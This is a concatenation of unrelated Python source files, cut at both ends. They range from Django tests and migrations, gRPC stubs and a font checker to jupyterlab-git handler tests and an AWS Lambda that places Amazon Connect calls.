                self.fields[field].widget.attrs['placeholder'] = placeholders[field]
                self.fields[field].widget.attrs['class'] = 'stripe-style-input'
                self.fields[field].label = False
|
import django
from django.core.management import call_command
from django.test import TestCase
from mock import patch
class MigrationTests(TestCase):
    """Guard test: model changes in `herald` must already have migrations."""

    def test_no_migrations_created(self):
        # Patch sys.exit so makemigrations cannot kill the test runner.
        with patch('sys.exit') as exit_mocked:
            if django.VERSION < (1, 10):
                # django < 1.10 uses an "exit" param that works the opposite from django > 1.10's check param
                call_command('makemigrations', 'herald', dry_run=True, exit=True, verbosity=0)
                exit_mocked.assert_called_with(1)
            else:
                call_command('makemigrations', 'herald', dry_run=True, check=True, verbosity=0)
                exit_mocked.assert_not_called()
|
from unittest import mock
from assertpy import assert_that
from django.conf import settings
from snapshottest.django import TestCase
from opening_hours.enums import ResourceType
from opening_hours.resources import (
Resource,
send_resource_to_hauki,
update_hauki_resource,
)
class SendResourceToHaukiTestCase(TestCase):
    """Tests for sending/updating opening-hours resources to the Hauki API."""

    @classmethod
    def setUpTestData(cls):
        super().setUpTestData()
        # A resource that has not been sent to Hauki yet (id=None).
        cls.resource = Resource(
            id=None,
            name="Test Resource",
            description="",
            address="",
            children=[],
            parents=[1],
            organization="1234",
            origin_id="4321",
            origin_data_source_name="DataSource",
            origin_data_source_id="dts",
        )

    def get_send_response(self):
        """Canned Hauki API reply mirroring cls.resource, with id assigned."""
        return {
            "id": 1,
            "name": self.resource.name,
            "description": "",
            "address": None,
            "resource_type": self.resource.resource_type.value,
            "children": self.resource.children,
            "parents": self.resource.parents,
            "organization": self.resource.organization,
            "origins": [
                {
                    "data_source": {
                        "id": self.resource.origin_data_source_id,
                        "name": self.resource.origin_data_source_name,
                    },
                    "origin_id": self.resource.origin_id,
                }
            ],
            "extra_data": {},
            "is_public": True,
            "timezone": "Europe/Helsinki",
        }

    @mock.patch("opening_hours.resources.make_hauki_post_request")
    def test_send(self, send_mock):
        """Sending a new resource returns an object carrying the new id."""
        send_mock.return_value = self.get_send_response()
        settings.HAUKI_API_URL = "themagicapiurl"
        settings.HAUKI_API_KEY = "verysecretcode"
        data = send_resource_to_hauki(self.resource)
        assert_that(data).is_not_none()
        assert_that(data.id).is_not_none()

    @mock.patch("opening_hours.resources.make_hauki_put_request")
    def test_update(self, put_mock):
        """Updating a resource that already has an id succeeds."""
        data = self.resource.convert_to_request_data()
        # Rebuild a resource from the request payload, this time with id=1.
        resource = Resource(
            id=1,
            name=data["name"],
            description=data["description"],
            address=data["address"],
            resource_type=ResourceType.RESERVABLE,
            children=data["children"],
            parents=data["parents"],
            organization=data["organization"],
            origin_id=data["origins"][0]["origin_id"],
            origin_data_source_name=data["origins"][0]["data_source"]["name"],
            origin_data_source_id=data["origins"][0]["data_source"]["id"],
        )
        put_mock.return_value = self.get_send_response()
        settings.HAUKI_API_URL = "themagicapiurl"
        settings.HAUKI_API_KEY = "verysecretcode"
        data = update_hauki_resource(resource)
        assert_that(data).is_not_none()
        assert_that(data.id).is_not_none()

    @mock.patch("opening_hours.resources.make_hauki_put_request")
    def test_update_raises_when_no_resource_id(self, put_mock):
        """Updating a resource without an id must raise ValueError."""
        put_mock.return_value = self.get_send_response()
        settings.HAUKI_API_URL = "themagicapiurl"
        settings.HAUKI_API_KEY = "verysecretcode"
        with self.assertRaises(ValueError):
            update_hauki_resource(self.resource)
|
#!/bin/python3
def surfaceArea(A):
    """Return the total surface area of the 3D solid described by height map A.

    A is a 2D list of non-negative integers where A[y][x] is the number of
    unit cubes stacked at cell (y, x). The area counts tops, bottoms and all
    exposed side faces.
    """
    rows, cols = len(A), len(A[0])
    total = 0
    # Tops and bottoms: every non-empty stack contributes exactly two faces.
    for row in A:
        total += sum(2 for height in row if height > 0)
    # Side faces: slice the solid into horizontal levels and count, per level,
    # each cell face that borders either the outside or a shorter neighbour.
    tallest = max(height for row in A for height in row)
    for level in range(tallest):
        for y in range(rows):
            for x in range(cols):
                if A[y][x] <= level:
                    continue  # this stack does not reach the current level
                for ny, nx in ((y - 1, x), (y + 1, x), (y, x - 1), (y, x + 1)):
                    inside = 0 <= ny < rows and 0 <= nx < cols
                    if not inside or A[ny][nx] <= level:
                        total += 1
    return total
if __name__ == "__main__":
    # Read the H x W height map from stdin: first line "H W", then H rows of
    # W space-separated integers, and print the resulting surface area.
    first_multiple_input = input().rstrip().split()

    H = int(first_multiple_input[0])
    W = int(first_multiple_input[1])

    A = []
    for _ in range(H):
        A.append(list(map(int, input().rstrip().split())))

    print(surfaceArea(A))
|
# Copyright (c) 2012-2018 SoftBank Robotics. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the COPYING file.
""" Extract a binary toolchain package """
# FIXME: deal with the cyclic-import in a dedicated issue
# pylint: disable=cyclic-import
import os

from qisys import ui
import qisys.archive
import qisys.parsers

import qitoolchain.qipackage
def configure_parser(parser):
    """Register command-line arguments for the `extract` action.

    Args:
        parser: an argparse parser pre-populated with the qisys defaults.
    """
    qisys.parsers.default_parser(parser)
    parser.add_argument("package_path",
                        help="Path to the package to extract")
    # Fix: the help text previously had an unclosed parenthesis.
    parser.add_argument("-o", "--output", dest="output",
                        help="Where to extract the files (default: working directory)")
def do(args):
    """Extract the given toolchain package.

    Tries to parse the file as a qiPackage first; on failure falls back to a
    plain archive extraction.  Requires `qisys.archive` to be imported at the
    top of the file (it was previously used without an explicit import).

    Args:
        args: parsed command-line arguments (package_path, output).

    Returns:
        The destination directory the package was extracted to.
    """
    package_path = args.package_path
    output = args.output or os.getcwd()
    qipackage = None
    try:
        qipackage = qitoolchain.qipackage.from_archive(package_path)
    except Exception:
        # Deliberate best-effort: any parse failure just means "not a
        # qiPackage"; we fall through to generic archive extraction below.
        pass
    res = None
    if qipackage:
        # Build a descriptive destination name: <name>[-<target>][-<version>]
        name = qipackage.name
        if qipackage.target:
            name += "-" + qipackage.target
        if qipackage.version:
            name += "-" + qipackage.version
        dest = os.path.join(output, name)
        res = qitoolchain.qipackage.extract(package_path, dest)
    else:
        res = qisys.archive.extract(package_path, output)
    ui.info(ui.green, "Package extracted to", ui.reset, ui.bold, res)
    return res
|
# -*- coding: utf-8 -*-
from sopel import module
from sopel.module import commands
import random
import re
@commands("ping")
def normal_ping(bot, trigger):
    """Reply "Pong!" to the ping command."""
    bot.say("Pong!")
@commands("pong")
def normal_pong(bot, trigger):
    """Reply "Ping!" to the pong command."""
    bot.say("Ping!")
@commands("linel")
def normal_linel(bot, trigger):
    """Easter-egg greeting for 'linel'."""
    bot.say("Ese men es mi brother <3 by Xenial")
@commands("status")
def normal_status(bot, trigger):
    """Report that the bot is operational (Spanish)."""
    bot.say("Estado del bot: Operativo")
@commands("xenial")
def normal_xenial(bot, trigger):
    """Describe the bot's original developer (the xenial command).

    Fix: this was a second ``def normal_status`` definition; the duplicate
    name rebound the module attribute and shadowed the ``status`` handler
    defined above, so only one of the two commands was registered.
    """
    bot.say("Un Espaรฑol que desarrollo XeniBot")
@commands("estado")
def normal_estado(bot, trigger):
    """Spanish alias of the status command."""
    bot.say("Estado del bot: Operativo")
@commands("about")
def normal_about(bot, trigger):
    """Describe the bot and its authors."""
    bot.say("Soy Vortexz V-XeniBot, un bot desarrollado por Xenial, Reeditado por Freuddy.")
|
from django.urls import path
from .views import home, blog, post, search
# URL namespace for this app: reverse with "blog:home", "blog:post", etc.
app_name = "blog"

urlpatterns = [
    path("", home, name="home"),
    path("blog/", blog, name="blog"),
    # Post detail page keyed by integer primary key.
    path("post/<int:id>/", post, name="post"),
    path("search/", search, name="search")
]
|
# Dates (YYYY-MM-DD strings) of PG&E events.
# NOTE(review): several dates appear twice (e.g. 2017-06-19, 2017-06-20,
# 2017-07-07, 2017-07-27, 2017-07-31, 2017-08-01, 2017-08-28, 2017-08-29,
# 2017-08-31) — confirm whether the duplicates are intentional.
pge_events = [
    '2017-06-16',
    '2017-06-19',
    '2017-06-20',
    '2017-06-22',
    '2017-06-23',
    '2017-07-07',
    '2017-07-27',
    '2017-07-31',
    '2017-08-01',
    '2017-08-02',
    '2017-08-28',
    '2017-08-29',
    '2017-08-31',
    '2017-09-01',
    '2017-09-02',
    '2017-06-19',
    '2017-06-20',
    '2017-07-06',
    '2017-07-07',
    '2017-07-27',
    '2017-07-31',
    '2017-08-01',
    '2017-08-28',
    '2017-08-29',
    '2017-08-31',
    '2017-09-05',
    '2017-09-12',
    '2018-06-12',
    '2018-06-13',
    '2018-07-10',
    '2018-07-16',
    '2018-07-17',
    '2018-07-19',
    '2018-07-24',
    '2018-07-25',
    '2018-07-27']
"""This module is responsible for conversion of the videos to frame by frame format."""
import logging
from pathlib import Path
from typing import Any, Dict, List, Union
import imageio
import numpy as np
import pandas as pd
import tqdm
# This hotfix is added since imageio checks compability by file extension name instead of probing.
from imageio.plugins.ffmpeg import FfmpegFormat
from wai_data_tools import io
# Monkeypatch: accept any file regardless of extension so videos with
# non-standard suffixes (e.g. .mjpg) can still be opened by the ffmpeg plugin.
FfmpegFormat.can_read = lambda x, y: True
def get_video_reader(video_filepath: Path) -> Any:
    """Get a imageio reader object for the provided video file. Assumes ffmpeg encoding.

    Args:
        video_filepath: Path to ffmpeg compatible video file

    Returns:
        reader object for parsing video
    """
    # Extension checking is bypassed by the module-level FfmpegFormat hotfix.
    return imageio.get_reader(video_filepath, "FFMPEG")
def calculate_frames_in_timespan(t_start: np.ndarray, t_end: np.ndarray, fps: float) -> np.ndarray:
    """Compute the frame indices covered by the interval [t_start, t_end].

    The start index is floored and the end index is ceiled, so a partially
    covered frame at either end is included when possible.

    Args:
        t_start: start of time interval
        t_end: end of time interval
        fps: frames per second

    Returns:
        array with frame indices
    """
    logger = logging.getLogger(__name__)
    logger.debug("Calculating start and end frame.")

    frame_duration = 1 / fps
    first_index = t_start / frame_duration
    last_index = t_end / frame_duration

    if first_index % 1 > 0:
        logger.debug("Remainder when calculating the index for start frame is not zero. Performing floor operation.")
        first_index = np.floor(first_index)

    if last_index % 1 > 0:
        logger.debug("Remainder when calculating the index for end frame is not zero. Performing ceiling operation.")
        last_index = np.ceil(last_index)

    logger.debug("Frames with label start at frame %s and ends at %s", first_index, last_index)
    return np.arange(first_index, last_index)
def read_frames_in_video(
    video_reader: Any, frames_with_target: np.ndarray, sampling_frequency: int = 1
) -> Dict[int, Dict[str, Union[np.ndarray, bool]]]:
    """Read frames from a video reader, keeping every n-th frame.

    Args:
        video_reader: imageio reader for the video to filter.
        frames_with_target: array with frame indices for frames that
            should be marked as containing a target class.
        sampling_frequency: keep every n-th frame; 2 keeps every second
            frame, 4 every fourth. Default is 1 (keep all).

    Returns:
        Mapping of frame index to a dict of the form
        {"image": frame array, "contains_target": bool flag}.
    """
    logger = logging.getLogger(__name__)
    logger.debug("Filtering frames in video to label and non label frames")
    return {
        index: {"image": image, "contains_target": index in frames_with_target}
        for index, image in enumerate(video_reader)
        if index % sampling_frequency == 0
    }
def split_video_file_to_frame_files(
    video_filepath: Path,
    video_row: pd.Series,
    label_config: Dict[str, Union[int, bool, str]],
) -> Dict[int, Dict[str, Union[np.ndarray, bool]]]:
    """Split a single video file into per-frame entries.

    Args:
        video_filepath: Path to .mjpg video file
        video_row: Series with video information ("start"/"end" bound the
            labelled timespan)
        label_config: Label configuration ("is_target", "sampling_frequency")

    Returns:
        Dictionary where key is frame index and value is dict with frame array and target flag.
    """
    logger = logging.getLogger(__name__)
    # Read config values up front so a missing key fails before any video I/O.
    target_flag = label_config["is_target"]
    step = label_config["sampling_frequency"]
    logger.debug("Splitting video file to frame files...")
    reader = get_video_reader(video_filepath=video_filepath)
    metadata = reader.get_meta_data()
    labelled_frames = (
        calculate_frames_in_timespan(
            t_start=video_row["start"],
            t_end=video_row["end"],
            fps=metadata["fps"],
        )
        if target_flag
        else []
    )
    return read_frames_in_video(
        video_reader=reader,
        frames_with_target=labelled_frames,
        sampling_frequency=step,
    )
def split_video_files_to_frame_files(
    src_video_dir: Path,
    dst_frame_dir: Path,
    video_dataframe: pd.DataFrame,
    label_config: Dict[str, Union[int, bool, str]],
) -> pd.DataFrame:
    """Split all videos for the configured label into frame files on disk.

    Args:
        src_video_dir: Path to directory where video files is stored
        dst_frame_dir: Path to directory to store new data
        video_dataframe: Dataframe with video information
        label_config: Label configuration ("name" selects the rows to process)

    Returns:
        Dataframe with frame information
    """
    logger = logging.getLogger(__name__)
    logger.info("Reading and formatting excel dataframe")
    label_name = label_config["name"]
    logger.info("Filtering dataframe based on label %s", label_name)
    matching_rows = video_dataframe[video_dataframe["label"] == label_name]

    collected_rows = []
    for _, row in tqdm.tqdm(list(matching_rows.iterrows())):
        filepath = src_video_dir / row["folder"] / row["filename"]
        try:
            frames = split_video_file_to_frame_files(
                video_filepath=filepath,
                video_row=row,
                label_config=label_config,
            )
        except FileNotFoundError:
            # Missing videos are skipped; only a debug-level trace is left.
            logger.debug("Could not find file: %s", filepath.name)
            continue
        collected_rows.extend(create_frame_information_rows(video_row=row, frames_dict=frames))
        io.save_frames(video_name=filepath.stem, dst_root_dir=dst_frame_dir, frames_dict=frames)
    return pd.DataFrame(data=collected_rows)
def create_frame_information_rows(
    video_row: pd.Series, frames_dict: Dict[int, Dict[str, Union[bool, np.ndarray]]]
) -> List[pd.Series]:
    """Derive one metadata row per frame from the parent video's row.

    Args:
        video_row: Series with video information ("filename", "label", ...)
        frames_dict: Dictionary with frame information keyed by frame index

    Returns:
        List with rows describing frame information
    """
    output_columns = ["video_name", "frame_ind", "file_name", "target", "label"]
    rows: List[pd.Series] = []
    for frame_index, frame_info in frames_dict.items():
        row = video_row.copy()
        row["frame_ind"] = frame_index
        # Frames outside the labelled span are relabelled as "background".
        row["target"] = video_row["label"] if frame_info["contains_target"] else "background"
        row["video_name"] = row["filename"].replace(".mjpg", "")
        row["file_name"] = f"{row['video_name']}___{row['frame_ind']}.jpeg"
        rows.append(row[output_columns])
    return rows
|
# Copyright 2021 Katteli Inc.
# TestFlows.com Open-Source Software Testing Framework (http://testflows.com)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from testflows._core.testtype import TestType
def transform():
    """Transform msg to test name.

    Generator-based coroutine: the caller primes it with next() (first yield
    produces None), then repeatedly send()s message dicts.  For each message
    whose test type is Test or higher it yields the newline-terminated test
    name; for lower-level messages (and the priming step) it yields None.
    """
    msg = None
    while True:
        line = None
        if msg is not None:
            # msg["test_type"] is the TestType member name as a string.
            if getattr(TestType, msg["test_type"]) >= TestType.Test:
                line = f"{msg['test_name']}\n"
        msg = yield line
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from google.ads.google_ads.v6.proto.resources import account_budget_proposal_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_account__budget__proposal__pb2
from google.ads.google_ads.v6.proto.services import account_budget_proposal_service_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_services_dot_account__budget__proposal__service__pb2
# NOTE: Auto-generated by the gRPC Python protoc plugin; do not hand-edit.
class AccountBudgetProposalServiceStub(object):
    """Proto file describing the AccountBudgetProposal service.

    A service for managing account-level budgets via proposals.
    A proposal is a request to create a new budget or make changes to an
    existing one.
    Reads for account-level budgets managed by these proposals will be
    supported in a future version. Until then, please use the
    BudgetOrderService from the AdWords API. Learn more at
    https://developers.google.com/adwords/api/docs/guides/budget-order
    Mutates:
    The CREATE operation creates a new proposal.
    UPDATE operations aren't supported.
    The REMOVE operation cancels a pending proposal.
    """

    def __init__(self, channel):
        """Constructor.

        Args:
            channel: A grpc.Channel.
        """
        # One callable per RPC; (de)serializers come from the generated *_pb2 modules.
        self.GetAccountBudgetProposal = channel.unary_unary(
                '/google.ads.googleads.v6.services.AccountBudgetProposalService/GetAccountBudgetProposal',
                request_serializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_account__budget__proposal__service__pb2.GetAccountBudgetProposalRequest.SerializeToString,
                response_deserializer=google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_account__budget__proposal__pb2.AccountBudgetProposal.FromString,
                )
        self.MutateAccountBudgetProposal = channel.unary_unary(
                '/google.ads.googleads.v6.services.AccountBudgetProposalService/MutateAccountBudgetProposal',
                request_serializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_account__budget__proposal__service__pb2.MutateAccountBudgetProposalRequest.SerializeToString,
                response_deserializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_account__budget__proposal__service__pb2.MutateAccountBudgetProposalResponse.FromString,
                )
# NOTE: Auto-generated by the gRPC Python protoc plugin; do not hand-edit.
class AccountBudgetProposalServiceServicer(object):
    """Proto file describing the AccountBudgetProposal service.

    A service for managing account-level budgets via proposals.
    A proposal is a request to create a new budget or make changes to an
    existing one.
    Reads for account-level budgets managed by these proposals will be
    supported in a future version. Until then, please use the
    BudgetOrderService from the AdWords API. Learn more at
    https://developers.google.com/adwords/api/docs/guides/budget-order
    Mutates:
    The CREATE operation creates a new proposal.
    UPDATE operations aren't supported.
    The REMOVE operation cancels a pending proposal.
    """

    def GetAccountBudgetProposal(self, request, context):
        """Returns an account-level budget proposal in full detail.
        """
        # Stub implementation: subclasses override this with real behavior.
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def MutateAccountBudgetProposal(self, request, context):
        """Creates, updates, or removes account budget proposals. Operation statuses
        are returned.
        """
        # Stub implementation: subclasses override this with real behavior.
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')
def add_AccountBudgetProposalServiceServicer_to_server(servicer, server):
    # NOTE: Auto-generated registration helper; maps RPC names to servicer methods.
    rpc_method_handlers = {
            'GetAccountBudgetProposal': grpc.unary_unary_rpc_method_handler(
                    servicer.GetAccountBudgetProposal,
                    request_deserializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_account__budget__proposal__service__pb2.GetAccountBudgetProposalRequest.FromString,
                    response_serializer=google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_account__budget__proposal__pb2.AccountBudgetProposal.SerializeToString,
            ),
            'MutateAccountBudgetProposal': grpc.unary_unary_rpc_method_handler(
                    servicer.MutateAccountBudgetProposal,
                    request_deserializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_account__budget__proposal__service__pb2.MutateAccountBudgetProposalRequest.FromString,
                    response_serializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_account__budget__proposal__service__pb2.MutateAccountBudgetProposalResponse.SerializeToString,
            ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
            'google.ads.googleads.v6.services.AccountBudgetProposalService', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
# NOTE: Auto-generated by the gRPC Python protoc plugin; do not hand-edit.
class AccountBudgetProposalService(object):
    """Proto file describing the AccountBudgetProposal service.

    A service for managing account-level budgets via proposals.
    A proposal is a request to create a new budget or make changes to an
    existing one.
    Reads for account-level budgets managed by these proposals will be
    supported in a future version. Until then, please use the
    BudgetOrderService from the AdWords API. Learn more at
    https://developers.google.com/adwords/api/docs/guides/budget-order
    Mutates:
    The CREATE operation creates a new proposal.
    UPDATE operations aren't supported.
    The REMOVE operation cancels a pending proposal.
    """

    @staticmethod
    def GetAccountBudgetProposal(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        # Single-shot convenience call via the experimental API (no stub needed).
        return grpc.experimental.unary_unary(request, target, '/google.ads.googleads.v6.services.AccountBudgetProposalService/GetAccountBudgetProposal',
            google_dot_ads_dot_googleads_dot_v6_dot_services_dot_account__budget__proposal__service__pb2.GetAccountBudgetProposalRequest.SerializeToString,
            google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_account__budget__proposal__pb2.AccountBudgetProposal.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def MutateAccountBudgetProposal(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        # Single-shot convenience call via the experimental API (no stub needed).
        return grpc.experimental.unary_unary(request, target, '/google.ads.googleads.v6.services.AccountBudgetProposalService/MutateAccountBudgetProposal',
            google_dot_ads_dot_googleads_dot_v6_dot_services_dot_account__budget__proposal__service__pb2.MutateAccountBudgetProposalRequest.SerializeToString,
            google_dot_ads_dot_googleads_dot_v6_dot_services_dot_account__budget__proposal__service__pb2.MutateAccountBudgetProposalResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
|
from tornado.test.httpclient_test import HTTPClientCommonTestCase
# pycurl is optional: the curl-based test case is defined only when available.
try:
    import pycurl
except ImportError:
    pycurl = None

if pycurl is not None:
    from tornado.curl_httpclient import CurlAsyncHTTPClient

    # Re-run the common HTTP client test suite against the curl client.
    class CurlHTTPClientCommonTestCase(HTTPClientCommonTestCase):
        def get_http_client(self):
            return CurlAsyncHTTPClient(io_loop=self.io_loop)

    # Remove the base class from our namespace so the unittest module doesn't
    # try to run it again.
    del HTTPClientCommonTestCase

if pycurl is None:
    del CurlHTTPClientCommonTestCase
|
import contextlib
import os
from fontTools import ttLib
from google.apputils import app
from util import google_fonts as fonts
def _LoadGlyf(font, char, name, problems):
    """Loads a glyf and expands (populates fields) it.

    Args:
        font: A TTFont.
        char: int id of char, e.g. ord('C').
        name: name to use in problems string describing char. e.g. SPACE.
        problems: set to add problems to.
    Returns:
        2-tuple of (cmap_key, glyph). (None, None) if a problem occurred. Adds
        to problems if a problem occurred.
    """
    if 'glyf' not in font:
        problems.add('NO_GLYF_TABLE')
        return (None, None)
    # NOTE: Python 2 iterator idiom (.next()); uses the first unicode cmap table.
    cmap = fonts.UnicodeCmapTables(font).next().cmap
    if char not in cmap:
        problems.add('NO_%s' % name)
        return (None, None)
    key = cmap[char]
    glyph = font['glyf'].glyphs[key]
    glyph.expand(font['glyf'])
    return (key, glyph)
def _HasInk(font, glyph_name):
    """Checks if specified glyph has any ink.

    That is, that it has at least one defined contour associated. Composites are
    considered to have ink if any of their components have ink.

    Args:
        font: A TTFont that has a 'glyf' table.
        glyph_name: The name of the glyph to check for ink.
    Returns:
        True if the font has at least one contour associated with it.
    """
    glyph = font['glyf'].glyphs[glyph_name]
    glyph.expand(font['glyf'])
    if not glyph.isComposite():
        if glyph.numberOfContours == 0:
            return False
        (coords, _, _) = glyph.getCoordinates(font['glyf'])
        # you need at least 3 points to draw
        return len(coords) > 2

    # composite is blank if composed of blanks
    # if you setup a font with cycles you are just a bad person
    # Fix: use a distinct loop variable instead of shadowing the glyph_name
    # parameter, which made the recursion harder to read.
    for component_name in glyph.getComponentNames(glyph.components):
        if _HasInk(font, component_name):
            return True
    return False
def _CheckFont(font):
    """Inspects a font for space/nbsp issues.

    Args:
        font: A TTFont.
    Returns:
        A set of strings describing problems found in the font. Empty set if none.
    """
    problems = set()
    # _LoadGlyf records NO_GLYF_TABLE / NO_SPACE / NO_NBSP itself and returns
    # (cmap_key, glyph); only the cmap keys (glyph names) are needed here.
    (space_key, _) = _LoadGlyf(font, 0x0020, 'SPACE', problems)
    (nbsp_key, _) = _LoadGlyf(font, 0x00A0, 'NBSP', problems)

    if nbsp_key and _HasInk(font, nbsp_key):
        problems.add('NBSP_HAS_INK')
    if space_key and _HasInk(font, space_key):
        problems.add('SPACE_HAS_INK')

    if nbsp_key and space_key:
        # Advance widths (hmtx[name][0]) of space and nbsp should match.
        if font['hmtx'][nbsp_key][0] != font['hmtx'][space_key][0]:
            problems.add('SPACE_NBSP_WIDTH_MISMATCH')

    # Fix: 'problems' is already a locally built set; returning it directly
    # avoids the redundant set(...) copy.
    return problems
def main(argv):
    """Check each font file given on the command line for space/nbsp problems.

    Prints one line per file: the basename followed by a comma-separated,
    sorted list of problem codes (or OK).
    """
    for filename in argv[1:]:
        # closing() guarantees the font file handle is released per iteration.
        with contextlib.closing(ttLib.TTFont(filename)) as font:
            problems = _CheckFont(font)
        if not problems:
            problems.add('OK')
        # NOTE: Python 2 print statement; this module is Python 2 only.
        print '{:48} {}'.format(os.path.basename(filename),
                                ','.join(sorted(problems)))


if __name__ == '__main__':
    app.run()
|
import json
from unittest.mock import patch
import pytest
import tornado
from jupyterlab_git.handlers import NAMESPACE
from .testutils import assert_http_error, maybe_future
@patch("jupyterlab_git.git.execute")
async def test_git_add_remote_success_no_name(mock_execute, jp_fetch, jp_root_dir):
    """POST /remote/add without a name must default the remote name to "origin"."""
    # Given
    local_path = jp_root_dir / "test_path"
    url = "http://github.com/myid/myrepository.git"
    mock_execute.return_value = maybe_future((0, "", ""))

    # When
    body = {
        "url": url,
    }
    response = await jp_fetch(
        NAMESPACE,
        local_path.name,
        "remote",
        "add",
        body=json.dumps(body),
        method="POST",
    )

    # Then
    command = ["git", "remote", "add", "origin", url]
    mock_execute.assert_called_once_with(command, cwd=str(local_path))
    assert response.code == 201
    payload = json.loads(response.body)
    assert payload == {
        "code": 0,
        "command": " ".join(command),
    }
@patch("jupyterlab_git.git.execute")
async def test_git_add_remote_success(mock_execute, jp_fetch, jp_root_dir):
    """POST /remote/add with an explicit name must use that remote name."""
    # Given
    local_path = jp_root_dir / "test_path"
    url = "http://github.com/myid/myrepository.git"
    name = "distant"
    mock_execute.return_value = maybe_future((0, "", ""))

    # When
    body = {"url": url, "name": name}
    response = await jp_fetch(
        NAMESPACE,
        local_path.name,
        "remote",
        "add",
        body=json.dumps(body),
        method="POST",
    )

    # Then
    command = ["git", "remote", "add", name, url]
    mock_execute.assert_called_once_with(command, cwd=str(local_path))
    assert response.code == 201
    payload = json.loads(response.body)
    assert payload == {
        "code": 0,
        "command": " ".join(command),
    }
@patch("jupyterlab_git.git.execute")
async def test_git_add_remote_failure(mock_execute, jp_fetch, jp_root_dir):
    """A non-zero git exit code must surface as an HTTP 500 error."""
    # Given
    local_path = jp_root_dir / "test_path"
    url = "http://github.com/myid/myrepository.git"
    error_msg = "Fake failure"
    error_code = 128
    mock_execute.return_value = maybe_future((error_code, "", error_msg))

    # When
    body = {
        "url": url,
    }
    with pytest.raises(tornado.httpclient.HTTPClientError) as e:
        await jp_fetch(
            NAMESPACE,
            local_path.name,
            "remote",
            "add",
            body=json.dumps(body),
            method="POST",
        )
    assert_http_error(e, 500)

    # Then
    mock_execute.assert_called_once_with(
        ["git", "remote", "add", "origin", url], cwd=str(local_path)
    )
|
"""empty message
Revision ID: 9aab99cbf5c8
Revises: 97be1663d11c
Create Date: 2020-10-07 23:59:37.393430
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = "9aab99cbf5c8"
down_revision = "97be1663d11c"
branch_labels = None
depends_on = None
def upgrade():
    """Drop the unique constraints on users.first_name / users.last_name."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_constraint("users_first_name_key", "users", type_="unique")
    op.drop_constraint("users_last_name_key", "users", type_="unique")
    # ### end Alembic commands ###
def downgrade():
    """Restore the unique constraints removed in upgrade()."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_unique_constraint("users_last_name_key", "users", ["last_name"])
    op.create_unique_constraint("users_first_name_key", "users", ["first_name"])
    # ### end Alembic commands ###
|
import boto3
import os
import json
def get_key_from_ddb(key):
    """Fetch one item from the 'alert-log' DynamoDB table by its message-id."""
    dynamodb = boto3.client('dynamodb')
    return dynamodb.get_item(
        TableName='alert-log',
        Key={'message-id': {'S': key}},
    )
def put_item_on_ddb(key, item):
    """Store a message in 'alert-log' under the given message-id, flagged active."""
    dynamodb = boto3.client('dynamodb')
    attributes = {
        'message-id': {'S': key},
        'message': {'S': item},
        'active': {'BOOL': True},
    }
    return dynamodb.put_item(TableName='alert-log', Item=attributes)
def lambda_handler(event, context):
    """SNS-triggered Lambda: log the alert in DynamoDB and place an outbound call.

    Expects the SNS message body to be JSON with "message" and
    "destination_phone_number" keys.
    """
    sns_msg = json.loads(event['Records'][0]['Sns']['Message'])
    print(sns_msg)
    message = sns_msg['message']
    destination_phone_number = sns_msg['destination_phone_number']
    print(message)
    print(destination_phone_number)
    # NOTE(review): the "counter" item is read, incremented and written back
    # without any conditional write — concurrent invocations can race and
    # reuse the same key. Confirm whether at-most-once numbering matters.
    counter = get_key_from_ddb('counter')
    current_key = int(counter['Item']['message']['S'])
    next_key = current_key + 1
    print(str(next_key))
    print(put_item_on_ddb(str(next_key), message))
    print(put_item_on_ddb('counter', str(next_key)))
    connect = boto3.client('connect')
    # Placeholder ids below must be replaced with real Connect resource ids.
    response = connect.start_outbound_voice_contact(
        #Attributes={
        #    'message': message
        #},
        ContactFlowId='xxxxx-xxx-xxx-xxxx-xxxxx',
        DestinationPhoneNumber=destination_phone_number,
        InstanceId='xxxxx-xxx-xxx-xxxx-xxxxx',
        SourcePhoneNumber='+1510xxxx'
    )
    print('[info] Phone with number: ' + destination_phone_number + ' has been called with message: "' + message + ' "')
from datetime import datetime
from typing import Any, Callable, Dict, List, Optional
import numpy as np
import pandas as pd
import pyarrow as pa
from pandas.api.types import is_object_dtype
from slide.exceptions import SlideInvalidOperation
from slide.utils import SlideUtils
from triad.utils.assertion import assert_or_throw
from triad.utils.pyarrow import TRIAD_DEFAULT_TIMESTAMP
